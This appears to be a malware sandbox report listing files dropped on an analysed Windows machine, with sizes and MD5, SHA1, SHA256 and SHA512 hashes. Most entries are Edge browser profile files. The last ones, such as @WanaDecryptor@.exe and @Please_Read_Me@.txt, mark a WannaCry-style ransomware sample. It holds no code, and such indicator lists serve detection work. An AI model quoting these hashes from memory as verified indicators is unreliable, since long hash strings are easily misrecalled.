SHA512be146c12ca79914801588ce1c5fdb0ac556aacea6632aca1f92a323094a333d1227ad50df86bbebdca16e262e0b6456a05bf03582a0ab2612d59f5d68e895d7c
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5a19165d16a990cefac6bfbfc8857a038
SHA188e81d0ec13ceb9d8e20dccc2f4c2e3c038e312b
SHA25613fc5a2d91ecb097866ba0f5c2de0fc735c00bc5490802913a5d5df231601c1b
SHA512123efe6aaac5dae52dde4ae1082feeb63189c9121b138b2eaf257be1eb52a27e57bc0c1f9229d8858d0e1c6be2a59818b3d987b5f7432222f1de68b691ba1699
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5ef3c4fceafcae8e4a9b50a9bdb44a4e6
SHA14f56a7300f8f5075ca6794dde29674b644b41ab8
SHA256bf06044b750d0f2597e5afa76f4dbb3a97a6dbe8360c9bd54d67f1d232d8006d
SHA512b2a7d4218cbf5f67ff1249b5dc50073771443ce1efa6bef8b1f8e862d7e0b6b30356130129253fd8e047cc9e851323d25df1a744d80ced6d428468148433d9a1
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5808ebcc11076292d278c69a02e4b8c52
SHA104072f578bae78b9e4ccac9c38865776b0903a01
SHA256d11d2adba26efe2556a4448a4182d0126ffb0acde9596eb86d50736e71b94cbb
SHA512b89a5837b152a579e33361c1df8bcb772761935ae8de53f48a964c7458fd97a1e68662f4b3b183c92ae2431b4a23b085df7158fe9952f814df5b6b936873ce16
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD51e3938ea7cc86fcdb9b3e71fcf8e78ae
SHA18cb5fb5cb37a5bdd684a0721b012630ccc1fdb6a
SHA256d6b6ddd17783375eb03fbf327dc187528162ed949c5386b7af055a65ec5f15de
SHA512bd6c9f426f9300fe7f60df4ccd39ec39bc0386e3057eab0d6f8a05c1d6f1366f90d7a4e83bcc9bc099575020cadbe8c0709963d8a32e9a96aaa08fd47f67934a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
792B
MD5efc47cb48bac4ef5c7447cf23238dfc0
SHA106d73f755b4e148e18ed661b37dbb2c45494d49a
SHA2565d39675e6204cffe8cfe460087e270c9dc9176c1c5056d5da49e2751bebf35f1
SHA51250279495d924071032ea5dca52d32c2c05c9dd7f1e6034e51d805b00a60cf7fc461abc8c0d2fc70b4e1d3f6965298a639f5f3b2401f1587d4fdff635a67c1404
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD52e5e80cd46533428375128d45c2e1d03
SHA1ebba43c6022e120be555335c45537de690b08dde
SHA256a7eb28213895472d747a0af878b9ffe9dfd6523e81b5303fab6b1f77a1d8549a
SHA5123e2b75cdffa259d2323f38c3bde4b5c049354851c389b428cac83ea0f08a8402322f0b7e7a8e1ba3876ec5054d9cb8581dde77d044a13f0d659f43ac1ebc21b6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5d403c9abd247843858661f83e8e2b675
SHA11204bc53623de0cdef0fdf66f625cf49e565b4eb
SHA256a490a1ca6901ea370bb512d757882a26762359aac13e828b8a90d5031f525df6
SHA5127643b2ca65f2e164128f461385cfaa02962b89701ac0ee7e2a8d442daf6936b32a4e1c979e66ea04b6beba761c9470f9f02f25856f01379d467e381660e8d2e0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
48B
MD5e202f7cb9fca62476e95af326290c085
SHA1c4ef8b40e833d30b49b307ff383c0f879015ea5a
SHA256ac80dbff04dcbe9e7a0d6daa8f62dbeedda34cc079b21502df22a3706338dc7a
SHA5124f95e4179f6e19d2911949ee863ec20056449c0bae369c7725514b1377344382685e3974fe861ced2a33e36af29da048671452729563c478ae7c409d173ab6a6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
1KB
MD5e953b4b7c8bb4414572744e7900c8f4c
SHA11207ed2fdf0e0e84a025c6acbe20d6f4a9ea3655
SHA25674b267038f0c60d641379a4ce955a963ab4f1475c80e38dc9517704570f3ff01
SHA51210926b64e5c29681a8641686dfe380b5d2d84bfa5b7b1c2d0a6ea51281ce0a8f9c0fc07a7a480fdb1fa358eaacc485b4f1edc0be859e14e1bcc7b7f94b6ec565
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
144B
MD5308bf5b8c3b329938781cdece631de60
SHA111712e947c7bbae8190f8c799441d0017e02971a
SHA256af8777e44c345ae7c414eb8e5d242b704bbe97a8aaab7ef4fcd8d778c553e492
SHA5125eb78db95e60a3c2737117e0ac7cb815ab417fafd1e268e09bab2686a431259991839d917c47f25c8a05f9d9d377d3cdeb1f40432602166c407d7dd0541db2eb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-indexFilesize
120B
MD5cdfb131ca3de8803981629f42ebaa836
SHA19e7a07e9323f0f8be4f83977c0418d872205e10d
SHA2569248c8688a330353130c0dc41eea91d6b7a3ba1b33ce36b0e1b70af99a6019e4
SHA51206ff8de0273c7591d4fbeb0f1a409f22c643840255ccebebd0593dba19c538817731fac135912fe4bfe5b397814db7f4be5203e7ee85e3fde23ba5e0fc38f083
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Edge Profile.icoFilesize
70KB
MD5e5e3377341056643b0494b6842c0b544
SHA1d53fd8e256ec9d5cef8ef5387872e544a2df9108
SHA256e23040951e464b53b84b11c3466bbd4707a009018819f9ad2a79d1b0b309bc25
SHA51283f09e48d009a5cf83fa9aa8f28187f7f4202c84e2d0d6e5806c468f4a24b2478b73077381d2a21c89aa64884df3c56e8dc94eb4ad2d6a8085ac2feb1e26c2ef
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Microsoft Edge.lnkFilesize
2KB
MD58d5f0f6ef1cee51c7e2da6eac013f747
SHA1a4a36e277cd2d18c71c55df7c00b97314ce4589c
SHA2569babeb59b206a584ceb2cc0f6d8bf36cfccb6a352de6a6fdfa215688fbf38592
SHA5123297a8a6577b87950902bbd466e8100abbb3a773fa2fd3e90150052e874088cd1ae606918ac204f5c2ee8b329b01dbd985337c969368496fc308af25b8c820b0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
816B
MD5bf8ba97b9bbf07d0407230b2322d063a
SHA17b2ddb52f57c001b6b8fb96084f1c6693599a66b
SHA25604f5fe3aac9aaf725ec493f80ab0d94e9f1aaf5ba208da992465101610562655
SHA512cf2393e590c1699dd2624f210609fbfa345bd2858d006e157c29137ba41f196d5948efaa17c9c04152bef8f4d05ecd62153e7665e46489a823a493e25155efb3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
8KB
MD5df17d9d4d107c32d1e7bdee25e4fa65c
SHA1a1b861dc212a215a2b783582ffa51b4249c91f3a
SHA2560fd545f97e8aefb66aaf7b02ab0dfe7c8c44e5da9b2256b1c2b51e146ccbcfb8
SHA51279e5e3c9d8f7e90be08d621883fd994723f4ab1d78bb067ab7182f76a8a5adf5920c25daa4664bbb01def74316e7041fce69cde2f4ef58f6a7519d77931bdf1b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
816B
MD5522a50c94af49faefa9129bbd2c1f5be
SHA1a23035143ceb1afa879661e40f9b5510ca53e414
SHA25696eec23fb4ed1d6f65b24f47e217dd41b472778ea6d2cea761eb37a5a0c210cc
SHA5126c5e4951012dc954580556c9d7357afcbf6834856bfe2384967a38c55ec5b33013d74d111f10153f463b4c19a3331b4ca049eece6503e6eb91239eff37b0e9d5
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
816B
MD5b8874b85e486ac443f2b4816f163b822
SHA11457843c17a86828e5a4b6a900e08a533a4e384a
SHA256c203bb68c6b2e77fc9105a2276882b74a7f4d0190fcf6cd0b9b884bc8d2f714c
SHA5120fc4326c03ceda2c3357e12b1a2e43b6f32172cc7a7c3b37074a2f0216f91d6900041fd018b27ecab8b324bf25a6c207ea50a5ae4045c9e684a9abe18cbcc839
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent StateFilesize
111B
MD5285252a2f6327d41eab203dc2f402c67
SHA1acedb7ba5fbc3ce914a8bf386a6f72ca7baa33c6
SHA2565dfc321417fc31359f23320ea68014ebfd793c5bbed55f77dab4180bbd4a2026
SHA51211ce7cb484fee66894e63c31db0d6b7ef66ad0327d4e7e2eb85f3bcc2e836a3a522c68d681e84542e471e54f765e091efe1ee4065641b0299b15613eb32dcc0d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD569e17f1ba193a5704ff34f522ea6ec56
SHA1196afad3ba6eee4ed8b5b2be06d30eee2d9c6a2b
SHA25624d0745c01911e8103695bf9602102367a75b17cea196623e0df933407398e5e
SHA512c34622f370e9b58a0ba088e0291ef733b7afbd75ef9b637803be061f5ae4ce65e76b203d67ac2b86b0a84b2133cfad46cba5df076d8780a21a3cd8b609cb6b4b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57885b33d66d2b157b2db32114263d24b
SHA1614a825170b48a509d138dfb19cd91acecf2047a
SHA2564f8ad81f8417bb8fe906960afaf9da0611b4649fed563b58542ef074c31ef351
SHA512935886013afd49ae2160252f45644f5f69e2ec7dbb66e0bddb5020f355f5aeec87d65e72f823003673ae411db0ef9db3e834a4f5e428dae86e9b5685593f26ed
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD547dcb5a2556edf9c74689f18adb033e3
SHA13269a7d0e9c68cd999d0cba8a1c5ac7e45768c3d
SHA256253eef2b938ebc56586ef0df74f972626d9adaf61440ef55289901569520d4d6
SHA512f0271f01a1205482344354c2d3b3489e08987bf0d450d3dc0e10e0dfb64cd94eea7680ed4a79fdcb2c0ba35158c4b1f4998db248158e0dd5285ccba3f80ead4a
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD530a264e6a3d22178bd36da586ffb0fae
SHA1fcf2080e2ed2bcce6cc6d9aae2153c41c8203899
SHA256e4b9197aa64ed73117df465582fcc30132c050c3e4a036d7f8e8ef3baf5bf218
SHA5121e3c8ae059f6ad6bc06f22747d5362dd05c6c090741fba121b6e615b1302c52f74d1d578814d6e48515ec12dc6ff1c6be79f4e4ef6a0bb37560bca25be9e3706
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
11KB
MD5ab9fb6d0d62ca937d635a1593cf8cb30
SHA1c74c7504e06c975eb99007b6dbc0461f4afdd2f7
SHA2567dc22ee076434ccd3741454859734f71c86978c82c69be2f75140c533cfe8034
SHA51204bb0fce70604e01f8b2c1bd86f778f7192cc1a5d5e20a4848fde5eab6b007c7cda5e310febfaf890cef932b8a37115b6475bbae880a6852f5609f0ea8566aa9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD579431c76152fd341648578b10226bdf1
SHA1496c584cc997a10c876c9a6cf0e47e3dd04fc07a
SHA256280911eb97bdc9f5bde5d44951c73212bc6ca0a6ebc1bd2f7b051cadce034e2a
SHA512da15242fdd07e7009fa199c6f3b9cd4a3f3baa76b035f050ab32fd1da407089f13fb4e35c7132844830c18e6ce54825f89f58b87890bc81bc749836b8f962da3
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5b0212785e56dcaab8e7ec1f9d8999bef
SHA15cb9bd8bb2070218aa59516a809280cf24132680
SHA2563dda37a77bcaf98e4e4631f4db7885e7cbc49a3fbc71dbab5a6d6193242401c8
SHA51229b9685b0e4e97ee1240d7c298238461cbdeb921ad1331f24d49c4d4fdef0e36913bb14bdfc9414dc4b0fb752ea77063e7704f06027a85e78f4f4b7b5c3a9498
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD58d0614a9ad75f13e6af90a4aaadeac2c
SHA1dd28dbed09c5cc235f541baa0a1b228bc0fd698a
SHA256e651e6a91aaf18b6ee8abb85bbd11d112dcc244dff4939f1b6e8a134703eba15
SHA5123f8a79556ff5b90ec03faf5fe55ddacbb4d49bc74211a2b987709cb3c23a1f2198fcecaf34e23c5a35efa04fdeba537fe9758062e165f50ad0189c7e383a6134
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5011dffb0bf3320c3e4a9145e9382263a
SHA12d94462b98fef6f35a420775485615a2fbbb118d
SHA2566c3231509ecefb878e55a77641c53ea3cdfe92e3c393c9703858d45642db3b03
SHA51270c94e1b5b38cc3b641551820a527ef728154600e2dd0a5d2da9a7b4b1b648d57dab83d8c9159852ab8221d5990a91952285a0d83461ba3ead58c0b8f16a74dd
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD57784581d841affce96267dd6a063687f
SHA15dac01b7d4d6273cdd9ad93cc70ac0da6212914b
SHA25631ad0d0afc5985c443bb740dc89251b3bffe2312f3ec068bf1f3e8efd2fb70ed
SHA512c93e4a4f120ede8f64a8284eb833ba1a13877457f1ebcacbb5b849890c2756a0880bb2037a45e799c7dac65cffb7bf747ce9bc7bc81745abf1eef0114e3ced6d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5aaa01c06282bf43eb5bb9626c24a7193
SHA13def3cc27bd6d2b7b9b09249da98905665b63118
SHA256a17cb0081db5ab6c622152c213fe9aa038535b99c728d335c1c71bf9927918b7
SHA5128f57d1358cb2d0e47c8a30f3b88e962185c5a32f79c15f8578e9c48f33276e0b6382bfa979f53c0e84e4f61b7efc05d14e66e3b31653fae674414bc41442d21f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5ee12864f6f7cb6adde30b5366740e356
SHA107a55c5f3b6a75abed36e4eb634a6f8869cec1da
SHA25646fa09b089d257fb94ce3f4b4884d9df489f96ca7746dbabfeb2c45834c81ee6
SHA5124b67b6d2b5d5250b4d8f7877cfc9587eb1c940cc4c5d1305d4018979beafaa302af997245f23ddda169d1370601f95934b78a194c00d96bd53f90c1cfd1e5edf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5e497d360c16bac73508ff8f0f75e23e3
SHA1afb5b3141c2bac335028cae766dc973e7d5eb6a3
SHA256349ab0ed8295d970163510b7cc9ecc4bb60fbe65881526d3ed0e15c398d4f973
SHA5128b8312001bd11ad1722f57c53e280fc80c4602008df8c9afd6dfeb5446c4b1e8be240c2f7134e8c753771d1fcd252bf6a0ad3fccea7622f7ee630a431d1741c7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5136a7b1f6e5c4950da6948c6c09a0b98
SHA12b97896f4fb8ffe287760d43c727c113514bb62f
SHA256fbaaf28980810e03cec86328269bbbfe46aa96c91d081809ff96399776755951
SHA5121601c653791529fdf7246db89cbb29d02368dd1067cb976d051417bc64fa4b2daac3892fe12eff513f8ae2de972dad0ce9ed7c3374b5b25a5348c6378a10909d
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD5b4a66fd996f5fee3467472c55ce669ff
SHA1b7485cf19026bb42a333469cde9707a4e449d1e0
SHA25646c2be262ed9f79240ec58d5280287d2ffef2dcc3955587ed335cb46c5571cbc
SHA51272ef3d93fba2b9dc1429e2d466d5ee04ee0accfe05b824e521bea94d2a7e777137f908940b6f222c6d446170906635a47276b1326bdd942ce1b6c7fd5764e5bf
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD516d5c7a649a4895def92d3c31e45c164
SHA1f41d305c97d32ca7ff27342cb1425907cc734424
SHA25648733a2f1093f3a338d8d20fdf696896fbe64fe7949c934c528dc3add9bdf338
SHA512b7946361de7c83691d3ed7b25d8a5e154b0674699932997c4ee39a45712589c416dc9104fe29cd7c757007b6b473946c576a17135f94f0ae15b5a7d48228a539
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
6KB
MD5566c65f775c07f9cc002ad834304e1da
SHA1c87f29396fb8a766774f9374df6f26b7fcbfbb5f
SHA2568b9d5ce75e6a755436acc78d8f71de4e38c3a94dc5d004963b93cb89a773c3c1
SHA512839ad8967c962b930841aae5061aa8ab10b78ffdc6c89645d28b0e94dcf56b02acc469ed6bbd3aeb985a9a5f64488c40ad2792fbd37930358b31e13da5022974
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
4KB
MD5aa48e4672dfcc8ecf17c30c7c193b295
SHA1434cd7671251e33b8826fc7c7bc1a636217051bf
SHA25694f203db72e85525fc7fe709ab8e308c9843f052ae9a0694d2828443bf365907
SHA5120d8658bf85e71d56289c4c9d06e473df345ee69fc6f8cc232d39a08fd41341b380ab42ec30aeb9402950f6d900daff900258849067aecb1677817e90a3b618de
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD5b0e429d8b90b05838bd7328ea60aed3f
SHA1468b5a77c504eeafd43fe0afef31d418be936437
SHA256a2a931bd7e40331b1e29957a15a802d02b0ea7ab35ae72158744c41ab8447f07
SHA5124b9a6b5248fd45906878d1416cd648b0949adc343f99012b6e9bd2961d0d28a0416515bbc73caaf0f47f77ed1c4ed679709bfe30b34e845f6ab6c86e9695dfb9
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD59e3b2ad473b35e6b43d1120196ac4708
SHA12d4d564d127b460ab9d31b338d47059a051ca147
SHA256edaad8e36b5abab01ed80efafee3d416c8f9e124725ca343ea1bce907c9194fa
SHA5124164bcb5763cabf5cff7b058a3850254e483135abc677433af1dd24e197a99efc2cc3b2131e9ee9a0295a45f48d617a109432d99ed994330822c30dd803a0348
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
5KB
MD5d5e5f40d42a728a9a31a0a2cd3956e18
SHA16ff96c4fbb47d5eadd6fe74d42d5aae0d83decae
SHA256efc62f4b8ff9dde615f4eda2cb78c92246d1d502f7c1b293e2b3ddca574ca23b
SHA5123b85e9720421fa95d7c8ef9bb4ade6375f3e2d1eb3a4cc403452289ccc25d9f1bbd4dc9698b1f50cb28cc47c3d92b30199252985658f5daf46053de7addf9d26
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\PreferencesFilesize
15KB
MD5dbc9d715829075737e940adfc43cb379
SHA12890aee66fd73f5623dc6d6b3b0beac3dc506e32
SHA2561f394edfa2e2cd4c4611af1b2e78e2b5abfc23b3a86d5f632637f02496623108
SHA5129d3dc29347685e68df513f925cce7698a3eb6ae6b1d65c020733ff61072673dbc6800b182a16a93e3c64da22e6cd0d43e9c72b3801426cb80b70a98ad235b742
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Secure PreferencesFilesize
24KB
MD502ee7addc9e8a2d07af55556ebf0ff5c
SHA1020161bb64ecb7c6e6886ccc055908984dc651d8
SHA256552d3ed359b7a52278ce621674d16428d8a7969f6cd5663df18e240cce66aadc
SHA512567989543c3848a0c3276d96b96ca761f750e4b71fb74f36d809f590ffe16a72fd5ece251737a8b1ffe65f0051e211bd7ad19d2b8b0b7ca1b7ffc86dd2a52883
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
5KB
MD5756293a3de74adea6a36231c712c28b8
SHA10e4abbb22db6551bb299071f1c1bd025a2141e33
SHA256a6c54e1352651a00f2b3ee398e20a90b49546a878754ac495dc004053d3f28a5
SHA51242ff7f1c17d0009c8d0a589af4cca1cf3c0ede37006cde1d42ac3fe975ac77d474b0da90712ec58d0980a1584eafebcdde339cca3f80b67dd17c2ebb1c7a31f7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurityFilesize
6KB
MD5339ceb1f550bece6ae208b3e263a06cf
SHA1c6bc9b17628a1c9383cea8cff51122a11135eebe
SHA25664e4c68eb6a354b576bec874cf12d2a7bbd5b5adb09e8d0e67542a45d069a32e
SHA512b525d9a0d7325315bbb9bd839ec3c7ffb8b4284c7b6fcf0579582322eaec4f5bb77dcd3c8dfa7a90f416d3044cf3a3fd0d12583b79bdcd3df9dd63742c441290
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENTFilesize
16B
MD5206702161f94c5cd39fadd03f4014d98
SHA1bd8bfc144fb5326d21bd1531523d9fb50e1b600a
SHA2561005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167
SHA5120af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\CURRENTFilesize
16B
MD546295cac801e5d4857d09837238a6394
SHA144e0fa1b517dbf802b18faf0785eeea6ac51594b
SHA2560f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443
SHA5128969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\MANIFEST-000001Filesize
41B
MD55af87dfd673ba2115e2fcf5cfdb727ab
SHA1d5b5bbf396dc291274584ef71f444f420b6056f1
SHA256f9d31b278e215eb0d0e9cd709edfa037e828f36214ab7906f612160fead4b2b4
SHA512de34583a7dbafe4dd0dc0601e8f6906b9bc6a00c56c9323561204f77abbc0dc9007c480ffe4092ff2f194d54616caf50aecbd4a1e9583cae0c76ad6dd7c2375b
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD5be46fcf15bba7334ecdbcfb733635f79
SHA195da809acc6037bd0c53fe152f1e9cbd15475944
SHA256745a9e4e473452a88ed60b8acaa6d0a8fdf421ecd294b79b37479b74cbb985b5
SHA5123e56c46cd81cd20dcfaedfcaceb3036271acf41ecc5fd599e2c0bc19753a0453296550d38b16549043f140ed100ad7c54dcbaaacdc3a4ce42b7e49213e0375d0
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD51fb9f1058425c10b7d5e228f72234592
SHA14abaaa51169c89bb3540c60d8d9afbd97f49b8bf
SHA2569ebcd123614c29f8eddfdb71cc25df480433ec009b4d5941b6d9d04b15adaa38
SHA512e9b58669dc03c365083bcec6f09ba685eceba1ee2989f6d7af8fa5d37b3da1aa248694b384bf012650c77421d51e6310dc270ab94293eeccebb3d5aa2aed8b71
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD54fbf77c57d40f2e45f7522a6f66bb351
SHA1e272b8294fb1742fa3aa6d7e1d65280a1b7d849f
SHA2560d03e36eb2ccd9d03160de36194e68a98036fc7092f74ba3265dfbcb8292b273
SHA5120e9d423789ea20ea52d5d25b53758fa0a61d28978e8c254d26c36eadcc0ec89f8170a721dc380ad02ac0a600b1d0dd80c6b63cd7129aaee9686d98e5594c61e4
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD573d65c02811a8582bb9d8c8b4040a987
SHA12ac056cb0fd1a326d437c275387a15bb56cfe635
SHA25614379edd3a1ae4a482071c0e5c2dbb6b1a01d8c89de8ceed4c91d8bdbf135ae2
SHA5120a27e1d693043b06892dffcf8cbe61d769dbcfabf45a53e7cb5819e8e2e4d03c65585490ef4999514a26cdd2be848e9b4ecd89abb88b2ae8b5d92c5a895e12db
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD51dd507dd42a9451b3e1520eaa7351e4c
SHA1761d480730ea696be0ba1029bb1c514b8f0941de
SHA256a28d8953475c521d18c604f970490446118587025fab395e47ed538b17ce6325
SHA512359f903f72deda62009ca39e3140238b5674c5590f913e807a30b43dbe676542a041d9594d4422d05b57e8822b5bff0c369c3d4de122d5e00e7e879e82800788
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
13KB
MD5f5c0c7f742db1fb237dd065e48f20771
SHA14ed0788e9b39533386336022c08f9edd98e22a00
SHA256d7716236b350c77aa236b999d13d68e2aae651e79f2c98cd5a98e65a6a86a068
SHA512a42b430ec0325238138b83fa4b4536a3e66a67879f511cc4a929047ab9840bd0a08491d0dbe7cf132fc7b134e1f48a8d786e26f021e656f5a67153c6917b3dbb
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
10KB
MD59f3fd50175e234e2d767485fcc816848
SHA1e714b35eacb06d98798f3704cef5417b5408287a
SHA256184272087ce8221f3cfead24973567d49c30dd42e168b6964df14190c8e19db6
SHA51278e7a45dc2ef0611b8090b78a09c2954a981ca35d43afff3c05fb708686322683f76a6494e0cebd629542a920a0a66bbcd06cc0dda948acfa1a1edfc05df4c3f
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local StateFilesize
12KB
MD59c88c61344d0eec390ad406066bad7da
SHA1212ec0dc5a91e6645002ae3e3428bb4856cf9802
SHA256a5ddb886f289ff4e9f4f7dde670a1d892f7795d014eca0984a7f588db867100d
SHA5122d594b5a3076fbaa22050f26ad44635ebe62c2ccf669f3571551b740530ec4e1d2491448c40086c247369fe0e704e34f3b45e79c18384b94e342f2dc6349b6c0
-
C:\Users\Admin\AppData\Local\Temp\00000000.resFilesize
136B
MD5180b50f329a49e35e8ee62e0ba266864
SHA15bebaf12531dc374f4041c47fcabb261666679df
SHA256c5baa85545e23aea10bcf2ff39217310e0291d95484dc71ac0eb5a269be7f686
SHA51242ede1e4dca37689230458e75dd05898b13baeddf6bc6f052661a751717c324938fd11085293ab37fb2d808f1df7df5d7aed081651567171927aef0a15c7ce95
-
C:\Users\Admin\AppData\Local\Temp\311251678944450.batFilesize
340B
MD53867f2ec82a7d77c9ffefb1aac8b7903
SHA106fccf19b9c498b5afa2b35da00e3ab28d56f785
SHA2564e25c23aa5babc853889d3e1e79bb01ca7650837b250314a8d50f2e2c4b6730f
SHA512b413994e5b9f0ecb956055c7befff14845b56bb658fd8280d3213fdfa175ff76bc56e082174f2475fdf2d1f9eff618ebfd80ee2b67c091eaf1fd9c94697da5aa
-
C:\Users\Admin\AppData\Local\Temp\@Please_Read_Me@.txtFilesize
933B
MD57a2726bb6e6a79fb1d092b7f2b688af0
SHA1b3effadce8b76aee8cd6ce2eccbb8701797468a2
SHA256840ab19c411c918ea3e7526d0df4b9cb002de5ea15e854389285df0d1ea9a8e5
SHA5124e107f661e6be183659fdd265e131a64cce2112d842226305f6b111d00109a970fda0b5abfb1daa9f64428e445e3b472332392435707c9aebbfe94c480c72e54
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exeFilesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exeFilesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exeFilesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exeFilesize
240KB
MD57bf2b57f2a205768755c07f238fb32cc
SHA145356a9dd616ed7161a3b9192e2f318d0ab5ad10
SHA256b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25
SHA51291a39e919296cb5c6eccba710b780519d90035175aa460ec6dbe631324e5e5753bd8d87f395b5481bcd7e1ad623b31a34382d81faae06bef60ec28b49c3122a9
-
C:\Users\Admin\AppData\Local\Temp\@WanaDecryptor@.exe.lnkFilesize
1KB
